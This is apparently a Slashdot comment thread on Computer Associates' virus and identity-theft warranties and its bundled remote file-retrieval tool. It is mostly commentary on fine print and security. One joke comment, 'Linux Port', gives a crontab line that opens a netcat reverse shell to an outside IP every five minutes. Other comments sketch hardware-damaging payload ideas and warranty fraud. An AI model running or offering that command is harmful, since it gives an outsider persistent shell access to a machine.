Computer Associates Offers Warranties

Kelvin D. writes, "Computer Associates has come up with a new angle to get consumers to buy its security software — a warranty with cash benefits if you catch a virus ($1,500) or get your identity stolen ($5,000). From the article: 'Users who want the identity theft coverage need to both install and register their copies of Warranty Corporation of America's Mobile Lifeline (included). No registration, no coverage.'" Moblie Lifeline includes something that sounds like a benign Trojan: it lets you retrieve or delete files from your stolen computer if it's ever connected again to the Internet.

question

[jimstapleton]

how do we know they are secure enough to prevent others from hacking in and doing that to your NOT stolen computer that you are using? Seems a huge potential downside.

Re:question

[diersing]

How long is the "Acceptable Use" agreement where you agree to never connect to the internet, install any applications, or turn the computer on?

Re:question

[jimstapleton]

I could care less about the acceptable use. I'm more worried about their one-stop-shop for hackers who want backdoors.

Re:question

[Em+Adespoton]

Along with this thought... how long until someone steals your identity, and contacts them to collect the money (saying that YOU are the one trying to steal their identity)? Similarly, the virus angle looks more like they're offering a bounty on new viruses... much cheaper than them having to do the work themselves (but could also generate gobs of new viruses designed to cash in on the insurance).

Spelling Error

Moblie Lifeline includes something that sounds like a benign Trojan: it lts you retrieve or delete files off a stolen computer if it's ever connected to the Internet.

It lets you?

Re:Spelling Error

It als lts you delet excss vwels.

Re:Spelling Error

No, it's "Its you ... all your data are belong to us..."

Re:Spelling Error

[JayTech]

The Spell Check Police aren't finished yet! Who's heard of the "Moblie" Lifeline? Everyone already knows the mob lies... sheesh

Call me crazy but

[Ravenscall]

I predict if they honor this and publicize it well, they will be bankrupt within two years.

Re:Call me crazy but

[pixelpusher220]

whaddaya bet the 'fine print' on the insurance says you *can't* tell anyone about it?

Re:Call me crazy but

[Ravenscall]

If they were Fight Club, they would not be advertising.

Re:Call me crazy but

I predict if they honor this and publicize it well, they will be bankrupt within two years.

Don't think so. Lets do some math.

Say you spend $25,000, all 500 PCs get botted so bad - 25000-4500 = 20500 profit and their tool doesn't have to work at all.

Now a real guarantee would be a refund of all that you spent in the last 2 years. But what the heck, do it. As if you really cared about security you wouldn't be running Windows with it's track record.

5K isn't going to be enough

[TubeSteak]

Those who do register receive up to $5,000 in the event of identity theft. The cash covers lost wages, legal fees, and fixing credit reports.

From what I recall of the various TV segments & news artciles about ID theft, $5,000 is going to even begin covering their losses.

IIRC, most people complain that the process takes years to resolve & tens of thousands of dollars to clean up.

Re:5K isn't going to be enough

[RedHelix]

They've been advertising this service in the TD catalog for a couple of months. The 1,500 warranty is for HARDWARE damage. Obviously, viruses and trojans are unlikely to ever cause a physical hardware problem with the machine, and even if they do it would be impossible to prove. They're essentially promoting a software warranty that they'll never have to honor.

Re:5K isn't going to be enough

[slackoon]

Of course 5K won't cover it all but it's a great start and will get you back on yoru feet again after identity theft. Maybe you would have them offer no coverage at all? Take it as a good thing and don't be critical just to make yourself feel better. As for the other comments. I agree that if they honor it they'll be bankrupt within 2 years. I say even less. One virus that exploits one weekness could finish them off! I expect that getting them to honor their "warranty" will be almost impossible but lets hope!

Re:5K isn't going to be enough

[Lordpidey]

Really? I've seen viruses that try to force a harddrive to read from a part of the disk that doesn't exist. Lets see how long your harddrive lasts after it slams its arm into the casing every 10 seconds. I've also heard of ones that shutoff your fans causing your processor to overheat (unless the bios steps in)

Re:5K isn't going to be enough

[merreborn]

"I've also heard of ones that shutoff your fans causing your processor to overheat"

As far as I know, since the introduction of the Pentium II 10 years ago, just about every BIOS will power your system down if it detects overheating. And most CPUs on the market have some variation of "SpeedStep", to clock down, and eventually halt, themselves in the case of overheating.

These aren't really things you can tamper with in software. Especially SpeedStep.

Re:5K isn't going to be enough

Yes but how many of these viruses are there compared to data damaging viruses? That's probably why it's only hardware replacement (and tech support, yippeee) because maybe less than 1% of viruses affect hardware at all. Also trying to prove that your hardware failed because of the virus and not a manufacturing defect maybe hard. If you have an old computer it maybe even harder. Hey it was 4 years old so it was bound to fail; no soup for you.

What if a retailers database is hacked and with that information your identity is stolen. Does this so called warranty cover that? I don't know the stats but I doubt a large number of identity thefts occur through personal computer hacking. More like hacked databases, phishing and stolen wallets or mail. This is a token warranty at best.

Re:5K isn't going to be enough

[Bender0x7D1]

You could make a virus that brings all mechanical components (hard drive, CD/DVD drive, fans)up to maximum speed and leaves them there, or alternates starting and stopping them, or anything designed to stress the hardware. You could be sneaky and only do it overnight so no one notices the noise. In a large corporation this abuse is going to kill at least 1 machine and probably more.

You could even be rude and set it to send 1000 completely blackened pages to every printer. Don't know if the warranty would cover peripherals or not. Hmmm... I wonder why Staples/Office Depot hasn't developed this virus yet? Even a few companies using all the toner in their printers would make a pretty good demand for supplies. Of course, HP makes a lot of profit from toner/ink sales and we know their position on "legal issues" so maybe they will develop it.

Re:5K isn't going to be enough

[just_another_sean]

5K isn't going to be enough

Agreed. People are going to need at *least* 640K.

Re:5K isn't going to be enough

[kimvette]

Don't give HP any ideas. It's bad enough that the implement expiration dates.

Re:5K isn't going to be enough

[ratboy666]

Back when I was young, I wrote some nasty payloads -- proof on concept only. Never attached such a payload to a "virus" or "trojan".

1 - Wait until 3am, then slam the floppy head into the backstop continuously. Also, load/unload the head. Objective: destroy the floppy drive.

2 - Identify a model by vendor. Rewrite the saved settings 10,000 times (damage the nv memory in the modem).

3 - Program out-of-spec settings to the monitor. Attempt to damage a monochrome monitor.

4 - Program nv memory on video card with settings that render it useless.

These days, flashing the BIOS would be interesting, or flashing the IDE hard drive or CD ROM drive.

Then, the warrantee would have to be honoured. Of course the objective of most "viruses" and "trojans" is theft of service, not physical destruction. So it isn't a big deal.

But, destructive software CAN be written.

YMMV
Ratboy

Re:5K isn't going to be enough

[fireboy1919]

That does crash a harddrive...made in 1993. Modern harddrive controllers will not let you address segments of the drive that don't exist. They just throw an error specifically because there were viruses that did this.

It's a trojan political trap

[Travoltus]

This new service will get people used to the idea that they can go around deleting other people's files without due process.

That'll later come back to bite us on the hiney when the RIAA demands this right - which they've done before.

Due process.
Due process.
Due process!

It's slow, it's agonizing, but the alternatives are cutting corners to achieve one's own definition of justice. I don't need to go into detail about the dangers of that...

Re:It's a trojan political trap

[Dr_Barnowl]

I don't see the legal downside of deleting files from your own hardware, even if it happens to be in the possession of a theif.

It's quite the inverse of what the **AA want, which is to be able to delete files on hardware that they do NOT own, as long as they claim "ownership" of the contents.

In this case, the due process is surely that you

• Own the hardware, legally
• Know the password
• Deserve to be able to delete your own files from your own hard drive.

This is no different to deleting files from your FTP server that happens to be located in a facility that was invaded by a foreign power or a bunch of revolutionaries. Do your rights to control the system of software in the hardware end, because your physical possession of that hardware has been truncated against your will?

The ONLY possible legal downside I can see here is that technically, if you destroy files over a network connection paid for by your theif, you are misappropriating his resource without his authorization in order to do so. Kind of a swings/roundabouts situation though....

Re:It's a trojan political trap

[Travoltus]

True, but part of my concern was that discerning that it is your own hardware is not always so cut and dry as it sounds in theory. When you get the cops to seize the machine, theoretically speaking, you know for sure.

But the flip side is, the cops are sofa king slow at pursuing these things.

Warranty - it's start.

It's about time the software industry started doing something about this!

This horseshit about using the software at your own risk and that they're not responsible for ANYTHING was such crap. Every other product has some sort of warranty.

Oh yeah, and this horseshit have having the EULA in the box! WTF!?!

My boss would love this

[celardore]

My work computer got infected by a trojan yesterday. I was browsing a BBS where some malicious user had posted a SWF that opened up some other page on an IP, I'm not sure but I think it could have been the most recent MS IE critical vunerability. My boss spent from 9am to 2pm trying to get rid of a trojan. The antivirus the PC already had was Symantec, which was what first alerted us to it this morning. It couldn't remove it, so we tried AVG and Pandasoft as well as House Call. Nothing would shift the damn thing, it ended up with me having to replace the PC with a spare one. He'd have loved to have cashed in on this, as we both wasted most of our workday.

Re:My boss would love this

[codepunk]

Smile, you deserved it...

Re:My boss would love this

[GotenXiao]

Stick a Linux LiveCD with AVG for Linux on it in the PC. Watch as AVG eradicates virus. Reboot.

Worked for me at i28 when I got a worm that would not die; AVG had blocked it from actually running, but something was keeping it there. Rebooted to my Linux partition, downloaded/installed AVG, worked a treat.

Re:My boss would love this

[Software]

Stick a Linux LiveCD with AVG for Linux on it in the PC.

A friend is having problems with viruses on her machine, and I'm trying to do this, but I have not found a LiveCD distribution with AVG. I've used Knoppix and Mepis, but they have ClamAV instead. I've seen some recommendations for LinuxDefender from bitdefender.com, but it looks like it was last updated in 2004. I'm probably going to use ClamAV from either Knoppix or Mepis, but I'm open to suggestions. Do you have any recommendations?

Re:My boss would love this

[GotenXiao]

Download SLAX. Extract the ISO, chroot to the extraction point, install AVG, remaster the ISO.

Re:My boss would love this

[rohan972]

get Ultimate boot CD. It has AVG, f-prot, McAfee and Avast, as well as a heap of other useful tools.

Fine Print

[HatchedEggs]

This is merely a marketing ploy. Lets be realistic, the fine print will actually keep this occuring in almost any instance.

I am also betting that there will be additional fine print about the identity theft... as it occurs so frequently. Plus, you will have to follow their guidelines. Which will probably include industry best practice information... which if you were willing to follow that, in most instances you wouldn't have a problem with identity theft anyways.

Re:Fine Print

[Daemonstar]

This is merely a marketing ploy. Lets be realistic, the fine print will actually keep this occuring in almost any instance.

I agree.

Since we're not informed as to what the "fine print" says, it is conceivable that it could include shipping the infected PC to CA or taking it to a "CA Authorized Repair Center", for inspection. If that is so, then there's not telling how long it could be before you get your computer back.

Re:Fine Print

[rtb61]

It is still far better than a warranty that just offers a refund on the price of the software. The point is with a penalty in place, the company has a powerfull incentive to ensure the quality of their software. Other companies treat software quality like a joke, with warranties that could not legally be used on any other kind of product. This is at least a step in the right direction. Given a choice between a conpany that can't warrant the program itself being free of software viruses and another company willing to put it's money where it's marketing mouth is, I know which product I would choose.

UP TO

[Thansal]

FTFA

Those who do register receive up to $5,000 in the event of identity theft. The cash covers lost wages, legal fees, and fixing credit reports.

The virus protection program offers up to $1,500 to replace up to three PCs, but only if those machines have "failed" due to the virus (spyware and adware aren't covered). Obviously, this is only a possibility if CA's security software cannot clean the infection.

blod is mine.

5K to fix all the crap you have to deal with if your personal information is ussed maliciously?
That will not cover it.

1.5K to replace up to 3 computers that have Failed? so probably up to $500 per computer (I tihnk computers are more expensive then that).

Admitedly the most a virus will normaly do is fry your data...

meh, I will pass (and how much does this "Warrantie" cost?

Re:UP TO

This is just about as useful as those "$25,000 insurance" protection claims your power bar has when you buy it. i.e. - sounds good on the package, but we make it completely impossible to collect on. But you bought our stuff because of it, didn't you!

Re:UP TO

wow, good for you. you saw right through that one partner. they tried to give you 5,000 dollars to help you out, but you're no dumbass...that won't fix EVERYTHING so you'd rather have nothing at all and complain about their insulting offer. i hear ya bud. got any other winning tips for me?

This makes no sense at all

[finkployd]

So, I am to believe that my identity will be stolen because my laptop is not secure enough.

NOT, mind you, because dozens (hundreds? Impossible for me to find out) of companies consider my personal and financial information to be their intellectual property to be sold to other companies.

NOT, mind you, because these companies have basically no interest in protecting the data in that losing it does not hurt them any (maybe a token fine tops). So they don't encrypt it, lose backup tapes, let employees take it home on laptops, etc.

NOT, mind you, because the banking and finance industry, against all common sense, believes my social security number to be not only a positive identifier, but an authentication token that obviously only I could ever know. And since we all need same minute loans, any credit apps must go through ASAP, no wasting time to take any steps to actually identify the person making the request.

Nope, it must be because my laptop is running the right CA software.

Finkployd

Re:This makes no sense at all

[sgtrock]

NOT, mind you, because the banking and finance industry, against all common sense, believes my social security number to be not only a positive identifier, but an authentication token that obviously only I could ever know.

I can't speak for every bank, but I know the one that I've worked for for 10 years finally figured out a few years ago that using a customer's SSN for anything other than necessary reporting to the Feds was a Bad Thing (tm). We've been diligently scrubbing databases every place we could ever since. We're not done, but we are getting there. Optimistic estimates put us at 85% done. Realistically, we're probably about 60% done.

Re:This makes no sense at all

[finkployd]

That is great to hear, but I suspect your bank is the minority.

And either way, the real problem is the instant credit industry, which has no real reason to exist yet opens up all of these ID theft problems by rushing to approve any and all credit without any checking of identity. They treat SSN like a kerberos ticket when it is barely even a good ID.

Finkployd

I forsee a nice way for some money on the side

[Opportunist]

1. Be another Antivir company.
2. Buy CAI's package.
3. Infect your machines with the latest trojans that NOBODY has any signatures or heuristics for.
4. Profit.

Re:I forsee a nice way for some money on the side

[Rob+T+Firefly]

3. Infect your machines with the latest trojans that NOBODY has any signatures or heuristics for.

And what's more 0-day than a brand new virus? I wonder if this could set off a new wave of virus writers, who aren't just doing it to be jerks or prove concepts. Ever see a pyromaniac shop for fire insurance?

Re:I forsee a nice way for some money on the side

[Obsidian+Dagger]

I can see people buying this, downloading a copy of Chernobyl (or some other virus that causes hardware damage by rewriting the BIOS), and getting their old PCs replace be Chernobyl can not be removed once it rewrites the BIOS on old motherboards that have a single surface mounted flash ROM. I be the EULA has all kinds of outs written it it. Fare thee well and do not take the above as a suggestion as if the can prove you did it yourself you will go to jail for fraud.

It's gonna suck to be CA tech support

[rsilvergun]

the $1500 dollar waranty only kicks in if they can't remove the virus. And hell, what counts as 'removing' a virus anyway. Given that most viruses use random file names and sizes, and many periodically update themselves to change their signatures (becomming 'new' viruses in the process), good luck proving that the virus wasn't fully removed. But that won't prevent the techies from taking the heat from an asshat who thinks he's due $1500.

Re:It's gonna suck to be CA tech support

[slowbad]

good luck proving that the virus wasn't fully removed

Computer Associates doesn't need techs -- since this is really just an insurance plan (read, profit margin)
they should hire people with HMO experience and a list of excuses like "it was a pre-existing condition."

"benign Trojan"

[Trillan]

Wikipedia calls a Trojan "a malicious program that is disguised as or embedded within legitimate software." Given that, something that the installer knows about and isn't malicious can't really be "a benign Trojan."

Re:"benign Trojan"

[Ravenscall]

Too bad you are using the Wikipedia definition, and Wikipedia is not research, it is gossip.

Re:"benign Trojan"

[psmears]

Quite right—the phrase "benign backdoor" would be far more appropriate...

Re:"benign Trojan"

[maxume]

Wikipidia isn't compatible with phrases like 'can't really be'.

Re:"benign Trojan"

[Trillan]

I used wikipedia only because it was the first online reference I checked, and it lines up with the classical definition.

And at least spell wikipedia right if you expect to be taken as an authority on it.

Re:"benign Trojan"

[maxume]

I don't expect to be taken as an authority on it. I love the idea. The process is horribly broken.

My recent favorite example:

http://en.wikipedia.org/wiki/E-mail_address

That page stinks. I look at it and don't even want to try to change it, because I expect to but heads with moron.

My next full time job

[pHZero]

1) Write one new virus a week 2) Infect my own PC 3) Collect weekly salary of $1500 (Profit!!!)

Lets you retrieve files?

[sdirrim]

So, what this seems like is it lets you connect to your stolen computer to retrieve the files. A sort of hidden, unprotected FTP server on your computer. Couldn't this possibly be used by a hacker to steal your files remotely? How does the computer know it has been stolen, and how does it identify the rightful user? And how can you ensure that someone doesn't get your files before you do?

Seems like a potentially dangerous utility, even worse than the Sony rootkit.

Re:Lets you retrieve files?

[RAMMS+EIN]

``How does the computer know it has been stolen''

I think that's the key. The program could be such that it will only let you retrieve and delete files once the computer has been reported stolen. Strong cryptography should be enough to prevent spoofing this. At least, I think that's how I would design it.

Identity theft payouts could be interesting

[IIH]

"benefits if you catch a virus ($1,500) or get your identity stolen ($5,000).

"Well, Mr. Smith, our records do show that this identity was proven to be stolen. Of course we paid out according to our warrenty. Our records show the $5,000 was paid out on X date. You didn't receive it? Well, we sent it to Y address. That's not you? Oh, it seems to have been paid to the wrong person, but unfortunately we can't do anything about that, as it appears you've been the victim of identity theft. Want to buy a warrenty to protect you against this in the future? No? Well, have a nice day.

The Fine print

[fenodyree]

If your laptop or personal computer (collectively "PC" and "PC's") fails due to a virus infection after the CA Anti-Virus 2007 software is properly installed and registered, you can receive up to $1,500.00 in technical service and hardware replacement under the limited warranty associated with the CA Anti-Virus 2007 software. Covered malfunctions include:
* Your PC will not boot or start up; or
* Your PC will boot and the hard drive is accessible, but the operating system is malfunctioning, causing other components to not operate properly.

Does "properly" mean not as fast as it should, internet explorer sending my data somewhere it shouldn't? What is Properly. That world will cause CA to soar or sink, depending on how judges define it.
Cheers,
-feno

Re:The Fine print

[RAMMS+EIN]

Also note "up to $1,500.00 in technical service and hardware replacement". That is no cash and at most 1500 USD.

Re:The Fine print

[spikedvodka]

also I'm sure that they'll pull the old "Our Tech Support is work $1000 per hour, plus Long distance phone charges... stunt.

virus insurance

[openright]

like car/accident insurance. you get reimbused when machine is corrupted.

The premium is the security software lease/purchase costs.

Possibly, you get huge premium discounts if you use a non-windows os.

You have to wonder...

[WhiteWolf666]

Why the *HELL* Microsoft doesn't offer Warranty protection like this.

This is a great product, IMHO. This is CA putting their money where their mouth is. I don't know anything about their actual coding abilities, but I really like it from the actual business angle.

As for me, I run OS X & Linux, and have not yet had the need for an anti-virus product, even though an up to date ClamAV does reside on my systems.

Re:You have to wonder...

[nbannerman]

Why the *HELL* Microsoft doesn't offer Warranty protection like this.

I'm going to go out on a limb and suggest that having the lion's share of the world's virus, trojan, spyware and other such crap being targetted at your system precludes such an option. (Reasons for this left as an exercise for the reader...)

Re:You have to wonder...

[RAMMS+EIN]

Or perhaps one of these "Linux is soooooooo secure" people should back up their claims with a warranty.

Re:You have to wonder...

[MadMidnightBomber]

Why the *HELL* Microsoft doesn't offer Warranty protection like this.

Because they only have $40bn in the bank! Ba-dum tish.

Seriously, it's because they don't need to, liability for software flaws being almost the inverse of other forms of liability issues. Next time you have a major outage at work, try telling your boss to sue MS to recoup your lost earnings. Then time how long it takes him to stop giggling.

ugh

[nomadic]

$5,000, but you have to use CA software? Not worth it...

Re:ugh

[LookAtTheMonkey!]

Tommy: Here's how I see it. A guy puts a guarantee on the box 'cause he wants you to fell all warm and toasty inside.

Ted: Yeah, makes a man feel good.

Tommy: 'Course it does. Ya think if you leave that box under your pillow at night, the Guarantee Fairy might come by and leave a quarter.

Ted: What's your point?

Tommy: The point is, how do you know the Guarantee Fairy isn't a crazy glue sniffer? "Building model airplanes" says the little fairy, but we're not buying it. Next thing you know, there's money missing off the dresser and your daughter's knocked up, I seen it a hundred times.

Ted: But why do they put a guarantee on the box then?

Tommy: Because they know all they sold ya was a guaranteed piece of shit. That's all it is. Hey, if you want me to take a dump in a box and mark it guaranteed, I will. I got spare time. But for right now, for your sake, for your daughter's sake, ya might wanna think about buying a quality item from me.

Awesome!!!

So you can steal someone's identity, and then receive another $5000 to boot!

Subject to what conditions?

[minerat]

I'm betting you'll have to PROVE that your identity was stolen via your PC. It probably won't be as simple as saying "I have a trojan that you didn't detect and my identity has been stolen". You'll probably have to connect the dots in a whole trail (though I haven't read the fine print, just speculating).

Only works if...

[Apocalypse111]

...it lets you retrieve or delete files from your stolen computer if it's ever connected again to the Internet.

All potential security holes aside, this presumes that the thieves didn't replace your HD after stealing it, or reformat/reinstall. What would be more useful would be a call-home email to your addy that gives you an IP address, nslookup and tracert data, as well as any other information that can be used to track it back to a physical address. Maybe a keystroke log as well, and a list of recently opened files and visited URL's?

not a new angle...

[ccwaterz]

I actually worked for a start up that tried this years ago. The company has been dead for 2 years now, but evidence of it still lingers. Google combinations of "Promisemark", "Virus Protection Plan", "Identity Theft Protection Plan", etc...

Wagon WAY before the horse...

[Vexler]

What CA is doing here is complete nonsense. Several problems spring to mind immediately:

1) Identity theft involves a lot more than just the laptop sitting in front of a user. It involves the user's total awareness of unusual requests for personal information and commitment to protect that information. Social engineering, dumpster diving, and (certainly) user stupidity can all compromise the security of the data. CA will find a good chunk of its customers who were just careless about what they wrote down or told whom, and kick itself in the pants. You can't indemnify human failure.

2) If the laptop is compromised by a virus that sends keystrokes to a Romanian website, CA will want forensic proof. It will have to see conclusive evidence that (a) its software worked correctly and was not subject to accidental or deliberate tampering by the user, (b) any personal information obtained in this manner was used intentionally to impersonate the user and cause harm, and of course (c) that the machine in question "failed" as a direct result of the virus (although to what extent "failed" covers is unclear). Just the resources necessary to conduct proper forensics alone is daunting enough, and $5000 for theft and $1500 for virus infection seems a pittance. It's a lose-lose proposition, and CA is trying to make it sound generous.

3) The offer to encrypt or destroy data on any stolen laptop is laughably absurd, and serves no purpose except as a way to TRY and get the last laugh in. "So you took my laptop? Well, I'll just have to think of a REAL GOOD comebacker. Oh, I know. If you are stupid enough to connect it to the Internet, I can erase what you probably already got off the drive by then. Ha, ha." The machine is gone and at the mercy of the thief, and Josephine User is up the creek with no paddles.

4) Most frustratingly, it is misleading for a technology company to offer services that distorts what "identity theft" really involves. You are not educating the user in the process except "If I lose my laptop I get $$$". You are not providing a truly comprehensive plan to combat this problem. All this "offer" does is to try and make money. Again, clever marketing does not make a bad idea into a good one.

they need something like that...

[zogger]

...to fully scratch up the platters in drives when the drive is going to be replaced and destroyed. Some command that would make the read head just scroll back and forth and scratch it all to heck. Obviously it would have to drop down a little, but perhaps it is possible to design them that way with that feature. A niche product but I bet they would sell.

There can be only one way to win!

[Mille+Mots]

irst you said:

NOT, mind you, because dozens (hundreds? Impossible for me to find out) of companies consider my personal and financial information to be their intellectual property to be sold to other companies.

Then you said:

NOT, mind you, because these companies have basically no interest in protecting the data in that losing it does not hurt them any (maybe a token fine tops). So they don't encrypt it, lose backup tapes, let employees take it home on laptops, etc.

If the data is their IP and source of income, then they will be 'hurt' when said data is 'lost.' Not that it ever is really lost, I'm sure you'd agree. As the data is replicated, the likelihood increases that these companies will find that their customers (and prospective customers) already have the data and therefore don't have a need to buy.

Extrapolated to the extreme, we could conclude, then, that the only way to make 'our data' less valuable, or have no value at all, is to distribute it far and wide. Once everybody has access to it, it becomes worthless as a commodity to be traded. Of course, that might introduce other subtle difficulties, but...<shrug>

--
/. helpful tip #304: Insightful + Funny == Insunnyful!

Re:There can be only one way to win!

[finkployd]

Except it does not work that way. The people who want this data (lenders, companies doing background checks, etc) need it to be valid and accurate. Nevermind that choicepoint has a history of screwing up and having inaccurate data, they are percieved as being the best and having the most (if not most accurate) data around, so that makes them useful. Those companies are not going to do their credit/background checks using data they got from a hackerz stolen ID website. The ID brokers have really nothing to fear when it comes to losing data. It does not hurt them, the people it does hurt cannot opt out of doing business with them (you have no say in the matter), and leaking it really does not decrease the value of it (for their purposes).

Extrapolated to the extreme, we could conclude, then, that the only way to make 'our data' less valuable, or have no value at all, is to distribute it far and wide. Once everybody has access to it, it becomes worthless as a commodity to be traded.

The problem with this is the value that lenders place on this data. Banks in the US make the totally braindead assumption that anyone with this data must be you, therefor they happily approve loans, credit cards, and in some cases let someone else sell your house (happens in Canada) just because they have gathered enough identifiers to convince a lender that they are you. Now you would think that this is clearly the lender's mistake, and their problem to deal with, but it is yours. And it generally takes thousands of dollars and years of work to clear your name (which sometimes never totally happens).

You can (and I usually do) make the arguement that while these ID brokers are causing a lot of problems with their incompetent security measures, the real problem is that the financial community places so much importance on this data as an identifier and authenticator.

Finkployd

Finkployd

Linux Port

[dbrian1]

crontab -e 0-59/5 * * * * nc 123.123.123.123 999 -e /bin/bash

The <really> Fine print

[smoker2]

Nothing in this warranty shall cause us to be liable in any way shape or form.
We reserve the right to change the wording the moment you make a claim.
We are an insurance company now, and boy are we gonna act like one !

Benign Trojan?

[plehmuffin]

That sounds about as enticing as a benign tumour

I fail to see their objective

Im not sure that offering cash in the event your identity is stolen is such a good idea.

What this will do is make people more complacent. People will take less care in ensuring that their details are kept safe because they are under the assumption that the software on their computer will do it for them. If anything, id expect identity theft to increase as a result of this bad incentive.

To me it sounds like a similar deal to putting seat belts in cars to make them safer (for the record I am not against it at all). Put the seat belts in, people feel more secure so they start taking more risks and causing more accidents.

It's not CA Software...

It's Warranty Corp software...
http://www.mobilelifeline.com/